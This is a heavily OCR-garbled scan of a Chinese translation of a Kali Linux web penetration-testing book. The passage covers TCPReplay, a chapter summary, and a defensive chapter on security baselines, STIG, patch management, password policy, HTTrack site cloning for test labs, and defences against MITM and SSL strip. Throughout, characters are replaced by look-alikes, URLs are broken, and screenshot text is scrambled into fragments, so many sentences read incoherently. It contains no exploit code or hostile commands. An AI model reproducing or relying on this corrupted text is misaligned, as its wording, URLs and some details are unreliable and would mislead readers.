TCPReplay 可 以 对 流量 进行 归 类 ， 确 定 是 客户 端的 还 是 服务 融 端 的 ， 重 写 2? 层 、3 层 、4 层 的 首部 ， 
并 将 数据 流 在 网 络 中 重 放 或 是 传输 到 其 他 设备 ， 如 交换 机 、 路 由 需 、 防 火 才 以 及 IDS/PS 。 
TCPReplay 文 持 单 网 卡 和 双 网 卡 模式 来 测试 串 探 和 内 联 设备 。 


简单 地 说 ，TCPReplay 可 以 抓 取 客户 端 和 服务 天 之 间 的 数据 流 ， 然 后 在 网 络 中 的 任何 位 置 
回放 。 
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6.10 ”小 结 


本 章 讨论 完了 Kali Linux 1.0 中 提供 的 可 对 Web 应 用 服务 带 执 行 渗透 测试 的 各 种 方法 。 到 了 这 
E, 相信 读者 应 该 已 经 知道 如 何 对 目标 进行 调查 , 找 出 目标 中 的 漏洞 ,以 及 跟 主机 和 客户 端 之 间 
交互 相关 的 所 有 内 容 、 漏 洞 利 用 和 中 断 服务 了 。 本 书 只 是 对 Kali Linux 中 可 用 的 各 种 工具 做 了 简 
要 介绍 。 不 过 , BR T Kali Linux, 你 还 要 将 许多 其 他 工具 加 入 到 你 的 渗透 测试 兵 占 库 中 。Kali Linux 
主要 的 贡献 在 于 提供 原生 工具 。 不 过 ， 顶 尖 滩 透 测试 人 员 还 会 利用 Kali 之 外 的 一 些 工 具 ， 比 如 基 
于 定制 脚本 和 工具 的 0-Day 攻 击 。 我 们 建议 你 深入 人 研究 一 下 本 书 中 介绍 的 攻击 方法 并 且 尝 试 多 个 
工具 ,积累 专业 渗透 测试 的 经 验 。 


本 革 看 重 介 绍 了 远程 找 出 和 利用 因特网 攻击 相关 的 着 洞 。 我们 介绍 了 浏览 副 利 用 攻击 、 代理 
攻击 和 密码 收集 。 最 后 ， 我 们 还 介绍 了 中 上 断 服 务 的 各 种 方法 ， 这 些 方法 可 用 于 对 Web 应 用 进行 压 
力 测试 ， 以 及 衡量 目标 面 对 DoS 攻 击 到 底 有 多 脆弱 。 


下 一 草 我 们 会 来 个 180 度 的 大 转弯 ， 看 看 如 何 用 Kali Linux 1.0 中 可 用 的 工具 来 防护 Web 应 用 。 


防御 对 策 


到 本 章 为 止 ， 我 们 已 经 介绍 了 如 何 用 Kali Linux 给 目标 造成 危害 。 现 在 可 以 换 位 思考 一 下 ， 
看 看 作为 防御 者 ,该 如 何 抵御 本 书 介 绍 的 攻击 方法 ， 以 及 其 他 形式 的 攻击 危害 。 防 护 面 癌 因特网 
的 资源 非常 困难 ， 因 为 它 是 暴露 给 整个 世界 的 ， 同 时 还 要 兼顾 运营 需求 ， 牺 牲 一 部 分 安全 来 保证 
“影响 受信 用 户 的 服务 。 在 整个 生命 周期 中 〈 从 提出 概念 到 终止 服务 )， 安 全 都 是 绝 关 键 的 ， 而 
不 是 有 些 人 认为 的 只 是 个 事后 补救 的 问题 。 这 不 仪 可 以 减少 服务 所 面临 的 威胁 , 还 可 以 降低 修复 
网 络 攻击 事件 的 成 本 。 


通 前 , 人 们 都 知 直 坏人 会 攻击 因特网 上 的 系统 , 不 管 是 什么 类 型 的 业务 。 作 为 防御 性 的 措施 ， 
公司 会 信任 针对 这 些 网 络 威胁 的 解决 方案 。 但 这 种 策略 的 问题 在 于 第 三 方 服务 提供 商 不 会 是 攻击 
的 受害 者 ， 不 会 因 网 络 攻击 事件 而 脓 受 损失 。 第 三 方 服务 提供 商 确 实 能 提供 一 定 的 保护 ， 不 过 ， 
他 们 对 超出 目 己 产品 控制 范围 之 外 的 任何 危害 都 无 第 承担 责任 ,造成 这 些 损失 的 原因 很 可 能 是 未 
做 更 新 、 配 置 错误 或 是 其 他 可 能 造成 缺口 的 各 种 情况 。 这 样 看 来 ， 第 三 方 服务 提供 两 也 不 可 徘 。 
此 外 ,许多 公司 会 用 多 个 第 三 方 服 务 提供 商 的 方案 , 但 它们 之 间 并 未 共识 安全 情报 ,这 使 得 攻击 
者 反复 绕 过 服务 提供 商 成 为 可 能 ,出 于 这 些 及 其 他 原因 ,我 们 推荐 客户 通过 加 固 系 统 以 降低 威胁 ， 
从 而 主动 担 起 保护 重要 资产 的 贡 任 。 


Kali Linux 是 领 完 的 渗透 测试 工具 ， 可 以 用 来 检验 哪些 系统 易 受 攻击 。 我 们 推荐 你 通过 对 网 
络 资产 进行 渗透 测试 , 以 便 在 恶意 个 体 攻 击 你 之 前 找 出 漏洞 。 但 我 们 不 推荐 你 用 这 些 手 段 攻击 其 
他 目标 。 这 里 我 们 看 一 下 孙子 在 《孙子 兵法 》 中 是 怎么 说 的 : 

知已 知 彼 ， 百 战 不 殉 ; 不 知 彼 而 知已 ， 一 胜 一 负 ; 不 知 彼 ， 不 知已 ， 每 战 必 有 殉 。 

我 们 相信 这 些 基本 理念 是 正确 的 ; 你 可 以 通过 Kali LinsocE FRAC, FMA CLBJISESSTAT S 

这 种 方法 的 优势 是 你 知道 它 会 发 生 什 么 , 你 可 以 采用 极端 措施 来 避免 租 发 警报 。 通 常 ， 黑 客 
们 不 会 冒险 骑 露 目 己 ,因此 他 们 在 攻击 时 可 选 的 方式 会 减少 。 偷 祝 很 考验 附 心 ， 同 时 也 要 求 保 持 
对 目标 的 最 小 接触 ,还 需要 大 量 的 计划 。 至 于 在 恶意 攻击 者 投入 更 多 时 间 和 资源 攻 入 你 的 系统 前 ， 
你 要 在 安全 上 投入 多 少时 间 和 资源 才能 保证 安全 ， 完 全 取决 于 你 。 本 书 作 者 最 喜欢 说 的 是 :“ 以 
防 万 一 O ” 
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本 草 将 会 介绍 使 用 Kali Linux 来 对 Web 应 用 进行 常见 漏洞 审查 的 不 同方 法 ， 以 及 其 他 加 固 网 
络 的 最 佳 方式 。 我 们 会 介绍 安全 基线 、 补 丁 省 理 、 密 人 码 案 略 ， 以 及 如 何 对 前 几 半 介绍 的 攻击 方法 
进行 防御 。 本草 还 会 专门 提供 一 方 来 着 重 介 绍 如 何在 调查 取证 过 程 中 使 用 Kali Linux. 在 发 现 Web 
应 用 或 其 他 资产 已 经 遭 侵害 后 ， 取 证 非 第 重要 ， 它 可 以 用 来 避免 未 来 的 负面 影响 。 


7.1 ”测试 你 的 防御 系统 


如 在 前 面 的 介绍 中 所 言 , 加 固 你 的 防御 系统 的 最 佳 途径 是 以 找 出 注 弱 环 市 为 目标 对 安全 管 控 
设施 进行 攻击 。 在 为 网 络 安全 防御 系统 制定 测试 策略 时 ， 你 需要 考虑 如 下 这 些 关 键 理念 。 


口 采用 黑 帽 、 白 帽 还 是 灰 幅 方法 ? 

口 复制 一 个 系统 来 进行 测试 还 是 在 实际 系统 上 直接 测试 ? 
a 渗透 测试 会 种 来 什么 潜在 风险 ? 

口 应 该 通知 到 哪些 人 ? 

口 主要 目的 是 测试 威胁 的 检测 和 响应 还 是 找 出 漏洞 ? 

口 是 否 有 需要 遵从 的 标准 ? 


先 看 一 下 制定 安全 验证 计划 的 过 程 。 我 们 知 要 先知 道 自己 的 安全 基线 , 这 样 才 能 知道 要 针对 
什么 进行 验证 。 


7.1.1 安全 基线 


业界 专家 最 喜欢 问 的 一 个 问题 是 你 对 安全 的 最 低 可 接 用 等 级 是 什么 .许多 企业 都 必须 癌 他 们 
所 在 行业 或 是 政府 制定 的 标准 看 齐 。 例如, 任何 接受 文 付 的 系统 都 必须 遵从 支付 卡 行业 数据 安全 
标准 (PCIDSS，Payment Card Industry Data Security Standard )， 医 疗 环 境 必 须 符 合 健康 保险 便利 
Fa TIER (HIPAA, Health Insurance Portability and Accountability Act )。 篆 见 的 标准 ， 如 我 们 
在 第 8 草 中 介绍 的 那些 ,通常 也 是 展现 渗透 测试 服务 价值 的 商业 驱动 力 因素 。 


在 标准 之 外 ， 建 立 安全 基线 的 一 个 好 的 起 点 就 是 审查 其 他 机 构 是 怎么 保证 他 们 系统 的 安全 
的 。 作 为 针对 美国 客户 的 安全 咨询 师 , 我 们 会 将 类 国政 府 对 敏感 信息 的 安全 处 理 作为 基线 安全 的 
样板 。 多 数位 于 美国 的 企业 都 更 倾 徊 于 采用 跟 日 是 类 似 的 安全 标准 。 同样 的 概念 可 用 于 其 他 国家 
的 IT 标准 、 特 定 组 织 的 安全 最 佳 方式 或 是 推荐 的 车 方 安全 管控 。 还 有 一 些 企业 出 版 的 安全 标准 的 
最 佳 方式 是 由 第 三 方 服务 提供 商 和 业界 领导 者 ， 如 国际 标准 化 组 织 〈《ISO ) 一 起 制定 的 。 


让 我 们 看 看 连接 美国 政府 所 管控 网 络 的 安全 基线 。 
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你 的 安全 基线 应 该 是 环境 中 最 低 安 全 等 级 。 最 佳 方式 是 对 系统 进行 超出 基 
线 的 安全 加 固 ， 因 为 许多 文档 化 的 安全 基线 由 于 受 较 早出 版 上 日期、 资助 方 和 其 
他 因素 的 影响 ， 都 很 有 限 。 


7.1.2 STIG 


安全 技术 实施 指南 (STIG, Security TEchnical Implementation Guide ) 是 针对 标准 化 的 安全 
安 猴 和 计算 机 软 人 硬件 维护 的 方法 论 。 这 一 术语 是 由 美 防 信 息 系 统 局 (DISA, Defense 
Information Systems Agency, ) 创造 的 。 该 局 负责 主持 草拟 文 持 美国 国防 部 (DoD，Department of 
Defense ) 的 配置 文档 。 安 全 技术 实施 指南 包括 建议 的 管理 流程 以 及 贯穿 资产 全 生命 周期 的 安全 
管控 。 


能 说 明 STIG 的 益处 的 一 个 例子 是 果 面 计算 机 的 配置 。 许 多 操作 系统 并 非 天 生 就 是 安全 的 ， 
因此 不 法 分 子 很 容易 攻 入 。STIG 描 述 了 如 何 最 大 程度 地 人 避免 基于 网 络 的 攻击 以 及 如 何在 攻击 者 
己 能 访问 设备 时 阻止 他 访问 系统 。STIG 还 撒 述 了 维护 的 流程 ， 如 软件 更 新 和 漏洞 补丁 。 


STIG 是 加 强 操 作 系 统 、 网 络 设备 和 应 用 安全 的 绝 佳 指南 。 你 可 以 从 http:/www.stigviewer 

人 你 会 发 现 STIG 文 档 包 含有 关 加 固 各 种 系统 的 一 步 步 教程 , 包括 Web 服 务 

骨 。 此 外 ，STIG 指 南 也 是 对 系统 进行 配置 使 其 满足 奋 干 强制 标准 的 第 一 步 。 对 于 美国 联邦 政府 
雇员 来 说 ，STIG 在 美国 国防 部 和 其 他 政府 组 织 控 制 的 网 络 中 是 强制 要 求 的 。 


Center for Internet Security ) 和 思科 网 络 基 础 保护 ( NFP, Network Foundation 


Protection )。 


| à 还 有 许多 其 他 资源 可 以 用 来 找 出 安全 标准 化 模板 ,如 互联 网 安全 中 心 (CIS ， 


7.1.3 补丁 管理 


随 着 上 日 标 性 攻击 和 0-Day 淘 洞 减 小 了 从 源 洞 毕 源 到 攻击 者 完成 开发 漏洞 利用 的 时 间 和 窗口 ， 安 
全 经 理 越 来 越 有 员 任 了 解 他 们 IT 环 境 中 的 各 种 资产 ,以 及 这 些 系 统 的 补丁 等 级 。 补 丁 管理 是 一 个 
持续 的 过 程 ， 只 有 当 我 们 了 解 了 何 时 补丁 才能 就 绪 、 何 时 应 用 补丁 按 优 先 级 排列 、 何 时 基于 业务 
需要 进行 验证 以 及 已 知 漏 洞 无 补丁 可 用 时 如 何 啊 应 , 补丁 管理 才 算 成 功 。 这 个 概念 同样 适用 于 系 
统 以 及 软件 的 内 部 应 用 ， 例 如 插件 。 


补丁 管理 只 是 更 大 范围 的 漏洞 生命 周期 中 的 一 环 。 第 一 步 是 找 出 漏洞 , 这 一 步 可 以 通过 第 
方 服务 提供 商 的 更 新 或 服务 完成 , 从 定期 扫 撞 到 坚实 的 渗透 测试 痢 可 角 我 们 应 该 制定 
一 个 打上 略 来 解释 不 同等 级 的 扫描 应 该 多 久 进 行 一 次 以 及 谁 负责 查看 已 发 现 的 威胁 。 建立 有 关 多 久 
进行 一 次 着 洞 扫 措 的 基线 的 一 个 比较 好 的 出 发 点 是 确定 你 必须 避 从 什么 强制 标准 , 因为 许多 部 会 
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包含 有 关内 部 和 外 部 漏洞 扫 摘 的 字眼 。 


生成 状态 报告 O 


扫描 网 络 


补丁 管理 的 第 二 步 是 对 识别 为 有 漏洞 的 系统 进行 啊 应 。 正 如 我 们 在 第 1 章 中 介绍 的 那样 ， 有 
漏洞 并 不 代表 它 台 有 风险 了 ， 除 非 我 们 通过 渗透 测试 或 其 他 方法 验证 了 该 漏洞 确实 可 以 被 利用 。 
对 一 个 漏洞 进行 安全 保护 可 能 上 只 需 要 打 一 次 补丁 或 做 一 次 升级 。 不 过 , 有 些 漏洞 可 能 需要 耗 充 更 
多 的 时 间 和 人 力 来 修复 。 在 这 些 场景 中 我 们 就 需要 对 风险 和 修复 汤 洞 的 投入 做 一 些 计算 。 


补丁 管理 的 最 后 一 步 是 根据 漏洞 对 业务 运营 的 影响 来 规划 打 补 丁 的 安排 。 这 一 点 非常 关键 ， 
因为 有 许多 被 攻击 的 系统 如 末 在 被 恶意 方 找 出 源 洞 之 前 就 打 了 补丁 , 那 就 会 比较 安全 。 我 们 发 现 
许多 客户 给 补丁 管理 预 留 的 维护 窗口 都 是 以 月 为 基础 的 , 或 是 更 长 时 间 , 这样 在 很 长 一 段 时 间 内 ， 
系统 狂 洞 窗口 都 会 又 露 在 外 面 , 很 容易 被 攻击 。 最 佳 方法 是 将 计算 跟 标 记 为 有 源 洞 的 系统 相关 联 
的 风险 以 及 当 威 胁 对 业务 运营 的 风险 达到 一 定 水 平时 调整 时 间 窗 口 的 权限 等 职责 交 给 信息 保障 
证 专家 。 

补丁 管理 是 玫 助 你 免 受 本 书 中 介绍 的 各 种 威胁 的 最 佳 防 御 对 宁 略 之 一 。 你 需要 确 你 定期 回顾 
你 的 组 织 是 如 何 应 对 补丁 管理 的 , 以 此 来 避免 因 本 可 以 防护 的 漏洞 而 成 为 受害 者 。 这 条 规则 适用 
于 所 有 学 管理 的 资产 ， 包 括 服务 上衣 和 Web 应 用 。 


7.1.4 ”密码 策略 


忆 的 来 说 , 具备 控制 可 能 结 来 能力 的 密码 薪 略 通 第 会 给 密码 强度 市 来 负面 效 末 。 撤 开 密码 条 
略 不 说 ， 基 于 人 的 本 性 ， 用 户 也 会 通过 重复 字符 、 可 预测 的 行为 《如 用 12345 来 扩展 密码 的 长 度 
以 满足 长 度 要 求 ) 或 其 他 方式 来 尽 可 能 地 简化 密码 。 而 且 ,， 用户 通 党 不 会 主动 修改 密码 ， 和 直到 系 
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统 强制 要 求 他 改 密码 。 出 于 这 些 考 愿 ， 密 人 码 策 略 应 该 还 循 如 下 指导 原则 : 


O 密码 过 90 天 就 会 自动 过 期 ; 

O 不 允许 用 最 近 5 个 密码 中 的 任何 一 个 作为 新 密码 ; 

口 强制 要 求 密码 必须 多 于 12 个 字符 ; 

口 可 以 使 用 任何 字符 ， 如 特殊 字符 ; 

口 强制 要 求 至 少 有 一 个 大 写字 母 ， 一 个 数字 和 一 个 特殊 字符 ; 

Q 警告 或 拒绝 使 用 重复 字符 串 如 12345 或 asdfg， 避 免 暴 力 枚 举 攻击 。 


计算 机 的 处 理 能 力 一 直 在 不 断 演进 , 也 就 是 说 , 破解 12 个 字符 的 密码 很 快 就 
会 变 得 很 容易 。2013 年 春季 发 表 的 一 篇 文章 说 ， 一 组 黑客 破解 了 16 449 个 经 过 加 
密 的 散 列 化 16 位 字符 密码 中 的 14 800 个 。 在 本 书 即 将 出 版 时 , 这 还 只 是 一 个 特例 ， 
不 过 , 对 未 来 的 黑客 来 说 这 会 是 很 常见 的 场景 。 你 可 以 考虑 将 密码 的 推荐 长 度 设 
成 一 个 可 变 目 标 。 


本 书 的 两 位 作者 都 是 Steve Gibson 开发 的 密码 生成 硕 的 粉丝 。 该 密码 生成 需 是 生成 随机 密码 
的 一 个 安全 途径 。Steve Gibson 开发 的 安全 随机 密 但 生成 融 可 以 在 位 于 https:Wwww.grc.comy/ 
passwords. html) Gibson 3% FUP 3X 58] . 


许多 网 站 和 Web 应 用 被 攻破 都 是 因为 Web 开 发 者 采取 的 是 不 够 安全 的 协议 。 
Web 开 发 者 应 该 采用 强加 密 来 存储 用 户 密码 和 数据 。 密码 应 该 实施 散 列 和 加 盐 等 
技术 以 便 降低 被 次 或 数据 丢失 的 风险 。 


你 可 以 用 本 书 第 3 草 和 第 4 章 中 介绍 的 密码 破解 工具 来 评估 系统 中 所 采用 的 密码 强度 ,推荐 的 
工具 有 John the Ripper、Johnny、Hashcat、oclHashcat 和 Ophcrack。Crunch 和 Hashcat 也 可 以 生成 用 
于 验证 密码 案 略 强度 的 密码 列表 。 


1 l , PT ore 
~ 有 一 些 网 站 ， 如 Crackstation， 会 提供 预 生成 的 流行 密码 列表 。 你 可 以 用 这 
些 列表 来 测试 密码 和 策略 的 强度 。 


7.2 构建 测试 镜像 环境 


在 对 系统 进行 基于 推荐 安全 设置 的 测试 前 ,在 检查 漏洞 或 是 通过 漏洞 利用 来 检验 易 受 攻击 系 
RAS, 你 很 有 必要 根据 测试 用 途 对 目标 系统 进行 克隆 生成 一 个 测试 环境 ,而 不 是 耻 接 在 真实 系统 
中 进行 测试 。 最 佳 方式 是 复制 所 有 一 切 ， 包 括 从 托管 Web 应 用 服务 的 便 件 到 所 有 内 容 ， 因 为 漏洞 
可 能 出 现在 任何 技术 层 。 在 克隆 环境 中 测试 可 以 给 渗透 测试 人 员 提 供 最 大 程度 的 目 由 , 测试 人 员 
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可 以 执行 任意 程度 的 攻击 而 不 必 担 心 对 运 达 活动 造成 负面 影响 。 尺 省 许多 人 虱 无 法 完全 锐 像 真实 
环境 ,但 构建 一 个 具备 同等 功能 的 虚拟 环境 通常 还 是 可 行 的 。 


1.2.1 HT Track 


HTTrack 是 一 款 免 费 的 离线 浏览 右 工 具 。HTTrack 允 许 你 从 因特网 上 将 站 点 下 载 到 一 个 本 地 
目录 中 ， 并 生成 所 有 目录 ， 从 服务 器 上 抓 取 HTML 文 本 、 图 片 以 及 其 他 文件 ， 并 存储 到 你 的 计算 
机 上 。 你 可 以 一 个 链接 一 个 链接 地 浏览 元 隆 的 网 站 ， 并 对 其 进行 漏洞 测试 。HTTrack 是 适用 于 入 
早 网 站 的 一 球 极 简 工 具 。 它 不 会 复制 动态 内 容 ， 也 不 会 复制 网 站 的 中 间 件 ， 如 数据 库 。 因 此 ， 它 
并 不 是 对 所 有 渗透 测试 环境 者 适用 。 


件 必须 能 抓 取 中 间 件 和 动态 内 容 ， 并 且 支 持 配 置 可 能 需要 用 到 的 目标 系统 的 管 


M 如 果 你 要 对 一 个 网 站 进行 全 方位 测试 ， 需 要 用 其 他 软件 来 克隆 目标 。 该 软 
RI 理 员 访问 权限 。 


在 写作 本 书 时 ，HTTrack 不 再 是 Kali Linux 预 朔 工 具 中 的 一 部 分 。 要 安装 HTTrack， 打 开 一 个 
Aina, iy Aapt-get install httrack。 等 到 安装 完成 后 ， 你 就 可 以 启动 HTTrack 了 。 打 
Fr Zi fal A , 输入 httrack。 


它 会 提示 你 输入 项 目 名 、 存 放 网 站 的 路 径 (默认 路 径 为 roobwebsites/ ) 以 及 要 克隆 目标 的 


URL。HTITrack 提 供 了 一 些 选项 来 控制 元 隆 目 标 ， 如 下 面 玲 图 所 未 。 还 有 一 些 其 他 可 选 的 问题 用 
来 定义 通配符 和 有 递归 层级 。 我 们 选择 第 二 个 选项 。 在 你 回答 完 问 题 后 , 选择 7 来 对 目标 进行 克隆 。 


:~# htt rack 


Welcome to HTTrack Website Copier (Offline Browser) 3.46+Libhtsjava.so.2 
Copyright (C) Xavier Roche and other contributors 
To see the option list, enter a blank line or try httrack --help 


Enter project name :DjShadow 


Base path (return=/root/websites/) : 
Enter URLs (separated by commas or blank spaces) :www.thesecurityblogger.com 


Action: 
(enter) 1 Mirror Web Site(s) 

2 Mirror Web Site(s) with Wizard 

3 Just Get Files Indicated 

4 Mirror ALL Links in URLs (Multiple Mirror) 
5 Test Links In URLs (Bookmark Test) 

© Quit 


HTTrack 会 开始 克隆 目标 以 及 所 有 相关 的 链接 。 它 需要 一 定 的 时 间 才 能 完成 ， 具 体 取 决 于 目 
标 网 站 的 大 小 。 下 面 的 截图 显示 了 HTTrack 克 隆 www.thesecurityblogger.com 的 过 程 。 


Mirror Launched on Wed, 
tsjava.so.2 [XR&CO'2010] 


15 May 
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2013 04:28:09 by HTTrack Website Copier/3.46+Libh 


mirroring www.thesecurityblogger.com with the wizard help.. 


.thesecurityblogger.com/?tag=advanced-persistent-threat (101100 bytes 


| thesecurityblogger. 
bua thaseciiri<ybloager- 
w.thesecurityblogger. 
ww.thesecurityblogger. 
w.thesecurityblogger 
i. thesecurityblogger. 
ww.thesecurityblogger. 
ww.thesecurityblogger 


com/w 
com/' 
com/w 
Comyw 
.Com/w 
com/w 
com/w 
.Com/w 
com/w 


-content/ 
ip-content / 
-content/ 
-content/ 
-content/ 
-content/ 
-content / 
-content/ 
content/ 


uploads, 
UPLoadsy 


uploads 


uploads/ 
uploads/ 
upLoads/ 
uploads/ 
upLoads/ 


‘2013/ 
/2012/ 
z7 2013/7 
/2013/ 
'2012/ 
2013/ 
/2012/ 
2011/ 
2011/ 


01/LadyWall.jpeg (39575 byt 


Q7/ddos-attack.jpeg (0 byte 
01/ 
(c 
07/ 
02/ 
07/ 
08/ 


PhishingEmail.jpeg (1024 
emily2 new.png (294866 b 
ddos.jpeg (31869 bytes) 
img0206ce.jpeg (218988 b 
Screen-Shot -2012-07 -20-a 
1197270079 viagral80x249mr 
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.thesecurityblogger. uploads/ 08/spamitl.jpg (128249 bytes) 


切换 到 指定 存放 克隆 网 站 的 目录 ， 你 就 能 开始 测试 了 。 


< Home websites 


hts-cache WWW. backblue.gif 


thesecurityblogger. 


com 


| | | | | 


hts-in_progress.lock hts-Lag.txt index.html 


7.2.2 ”其 他 克隆 工具 


Kali Linux 中 还 包含 其 他 一 些 网 站 克隆 工具 。 同 样 ， 这 些 工 具 不 可 以 复制 动态 内 容 
以 复制 网 站 中 间 件 部 分 ， 如 数据 库 。 因 此 ， 它 们 并 不 是 适用 于 所 有 渗透 测试 环境 。 


Q WebCopier 这 是 一 球 元 隆 网 站 用 于 离线 评估 ( 如 渗透 测试 ) 的 工具 。 
Ow3mir 这 是 一 蒜 全 功能 HTTP 复 制 和 镜像 工具 。w3mir 的 主要 关注 点 是 
或 几 个 远程 www 站 点 的 本 地 可 浏览 副本 。 


, WAH 


创建 和 维护 某 一 个 


7.3 防御 中 间 人 攻击 


中 间 人 攻击 很 难 防御 。 这 种 攻击 通 稼 发 生 在 党 害 人 可 控 范 围 之 外 ; 处 理 得 当 的 话 , 它 甚 至 不 
会 留 下 任何 明显 的 可 能 引起 受害 者 注意 的 痕迹 。MITM 通 常 只 是 更 收 恶 的 攻击 如 SSL strip 的 前 奏 
而 已 。 防 御 MITM 攻 击 的 一 种 常见 方 式 是 保证 网 站 使 用 的 都 是 SSL/TLS 3.0. 换 句 话说 , 确保 网 站 
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都 是 通过 HTTPS 或 HTTP 安 全 连接 访问 。 验 证 HTTPS 并 非 我 们 看 到 的 在 绿色 的 地 址 栏 上 带 上 一 个 
加 锁 的 图 标 那 么 简单 ,因为 攻击 者 可 以 向 受害 者 提供 证 书 服务 ,使 得 那个 会 话 看 上 去 像 是 安全 的 。 


要 正确 验证 一 个 HTTP 会 话 ， 你 需要 检查 该 证 书 ， 看 看 证 书 的 认证 机 构 ， 这 步 额外 的 工作 量 
将 许多 用 户 挡 在 了 验证 会 话 的 安全 性 的 门 外 ， 也 使 得 这 种 攻击 方式 非常 有 效 。 


Ed Equifax Secure Certificate Authority 
^ [©] Google Internet Authority 


L WÜ mail.google.com 


mail.google.com 
Issued by: Google internet Authority 
Expires: Thursday, October 31, 2013 6:59:59 PM Central 
Daylight Time 
© This certificate is valid 
> Details 


上 面 的 截图 显示 的 是 由 谷歌 互联 网 认证 机 构 (Google Internet Authority ) 颁发 的 Gmail SSLüE 
书 。 听 起 来 很 权威 , 但 谁 是 谷歌 互联 网 认证 机 构 呢 ? 我 能 信任 它 吗 ?” 它 真 的 就 是 谷歌 吗 ? ix 
子 中 ， 在 合 歌 互联 网 认证 机 构 之 上 还 有 为 外 一 个 名 为 Equifax 安 全 证 书 认 证 机 构 (Equifax Secure 
Certificate Authority ) 的 证 书 认 证 机 构 。Equifax 在 颁发 证 书 之 前 会 做 大 量 的 检查 和 权衡 ， 以 确保 
该 公司 是 一 个 有 效 的 实体 。 在 确认 了 是 Equifax 生 成 的 这 张 证 书后 , 我 更 有 信心 可 以 信任 这 张 证 书 
Ares 


归根 结 克 ,HTTPS 构 建 在 信任 的 概念 之 上 。 更 严格 地 说 , 这 个 问题 的 本 质 是 相信 颁发 该 证 书 
的 证 书 认证 机 构 是 有 效 和 合法 的 。 在 实验 环境 中 ,我 们 经 钊 能 看 到 各 种 触发 Web 浏 览 偶 警报 的 有 目 
签名 证 书 。 用 户 访问 网 站 时 经 稼 会 弹出 一 个 烦人 的 弹出 窗口 , 它 作 为 证 书 认 证 机 构 不 可 信 时 发 出 
警告 的 一 个 途径 ， 表 明 可 能 存在 MITM 攻 击 的 风险 。 


This Connection is Untrusted 


You have asked Firefox to connect securely to insidemit-apps.mit.edu, but we can't 
confirm that your connection is secure. 


Normally, when you try to connect securely, sites will present trusted identification to prove 
that you are going to the right place. However, this site's identity can't be verified. 


What Should 1 Do? 


If you usually connect to this site without problems, this error could mean that someone is 
trying to impersonate the site, and you shouldn't continue. 


Get me out of here! ) 


Technical Details 


| Understand the Risks 
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经 过 加 窗 的 虚拟 专用 网 络 ( VPN, Virtual Private Network ) 是 防止 中 间 人 攻击 的 另 一 个 途径 。 
在 进行 公 网 PP 地 址 掩 码 运 算 时 , 将 所 有 通过 你 的 设备 收发 的 数据 都 加 窗 ， 经 过 加 密 的 VPN 可 以 保 
证 你 所 在 的 网 络 不 会 被 除了 VPN 提 供 商 之 外 的 任何 人 监测 或 记录 。 


VPN 可 以 使 用 强 认 证 方法 , 例如 使 用 双重 认证 一 一 它 可 以 包含 一 重用 户 名 和 密码 认证 , 外 加 
其 他 某 种 认证 方式 ， 如 一 次 性 密码 (OTP, One-time Password )、 口 令 (Token), 或 是 证 书 。 这 
使 得 攻击 者 很 难 镭 取 其 他 用 户 建 六 VPN 连 接 需 要 的 认证 信息 。 


VPN 能 够 使 用 一 些 加 密 方 法 ， 如 PPTP、L2TP、SSL 和 IPSEC。SSL 和 IPSEC 类 型 的 VPN 相 比 
其 他 类 型 的 协议 提供 了 更 加 安全 的 数据 保护 ， 因 为 它们 采用 了 强加 密 协议 。 


VPN 可 以 由 私有 或 公共 组 织 提 供 。VPN 提 供 商 有 可 能 可 以 检查 你 的 数据 流 ， 
M 他 们 是 受信 任 的 服务 提供 商 。 因 此 ， 在 使 用 VPN 这 方面 ， 信 任 问 题 依然 非常 重 
要 。 你 必须 先 确认 是 否 信任 你 的 VPN 服 务 提 供 商 来 帮 你 保护 数据 和 隐私 。 你 的 

数据 安全 掌握 在 服务 提供 商 的 手中 。 


其 他 也 可 用 来 防御 MITM 攻 击 的 技术 包括 媒介 访问 控制 安全 (MACsec, Media Access Control 
Security ) 和 802.1x。 这 些 方法 采用 了 先进 的 网 络 技术 来 提供 源 地 址 认证 、 数 据 完整 性 以 及 数据 在 
网 络 中 传送 时 的 加 密 。 这 两 种 方法 都 要 求 保 证 数据 兼容 性 ， 并 且 为 了 有 效 使 用 必须 正确 启用 。 


防御 SSL strip 


SSL strip (参见 第 3 章 )， 它 允许 攻击 者 剥离 网 站 的 加 密 部 分 ， 查 看 受害 者 的 会 话 信息 ， 包 括 
Dla. ASSL strip 会 跟 其 他 类 型 的 攻击 连 在 一 起 ， 如 中 间 人 攻击 等 ; 也 就 是 说 ， 黑 客 会 抓 
取 所 有 数据 流 ， 并 除去 SSL 加 密 部 分 ， DOREY [a BAS Be TER A ZR, dX pu 
在 本 书 第 5 章 中 介绍 过 相关 内 容 。 


要 抵御 SSL strip 攻 击 ， 就 要 理解 SSL strip 是 如 何 对 受害 者 进行 漏洞 利用 的 。 该 攻击 利用 的 是 
会 将 用 户 从 未 加 密 部 分 重 定 问 到 加 人 密 部 分 的 网 站 。 当 你 浏览 http:/www.facebook.com 或 http://www. 
gmai.comH 时 ， 你 会 注意 到 你 将 被 重 定 问 到 https://www.facebook.com 和 和 https:/www.gmail.com。SSL 
strip 会 破坏 重 定 问 的 过 程 ， 强 制 受害 者 使 用 该 网 站 的 非 安 全 版 本 。 而 且 ， 即 使 该 站 点 没有 非 安全 
hd. ERAEN, SSL strip 也 会 截获 该 HTTP 请 求 ， 将 用 户 请 求 转 发 给 HTTPS 站 点 。 当 受 
害 者 这 么 做 时 ， 攻 击 者 就 能 查看 受害 者 的 整个 会 话 。 


对 抗 SSL strip 攻 击 的 一 种 方法 是 保证 网 站 没有 非 安全 版 本 ,并 且 他 们 不 实现 重 定 癌 功能 。 这 
么 做 可 以 阻止 SSL strip 攻 击 ， 因 为 这 里 不 存在 重 定 回 的 可 能 性 。 在 受害 者 被 攻击 时 ， 他 们 仅仅 只 
是 无 法 访问 网 站 。 站 在 现实 生活 中 可 实现 的 角度 看 ,我 们 知道 这 是 很 难 加 强 的 部 分 。 人 们 已 经 习 
惯 了 输入 不 安全 的 HTTP 请 求 ,， 并 且 在 逢 要 加 强 安 全 时 目 动 午 定 辣 。 还 有 ， 许 多 公司 并 不 希望 用 
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户 因 为 没有 访问 他 们 网 站 的 安全 版 本 而 以 为 他 们 的 网 站 宪 机 了 。 所 以 最 好 的 保护 SSL strip 的 方式 
是 教育 用 户 网 络 攻 击 是 如 何 进 行 的 ， 这 样 他 们 就 能 识别 出 来 。 


除 此 之 外 ， 我 们 前 面 列 出 的 针对 中 间 人 攻击 的 防御 方法 也 可 用 于 防御 SSL strip 攻 击 。 这 么 做 
有 效 的 原因 是 SSL strip 攻 击 依赖 于 中 间 人 攻击 才能 进行 。 


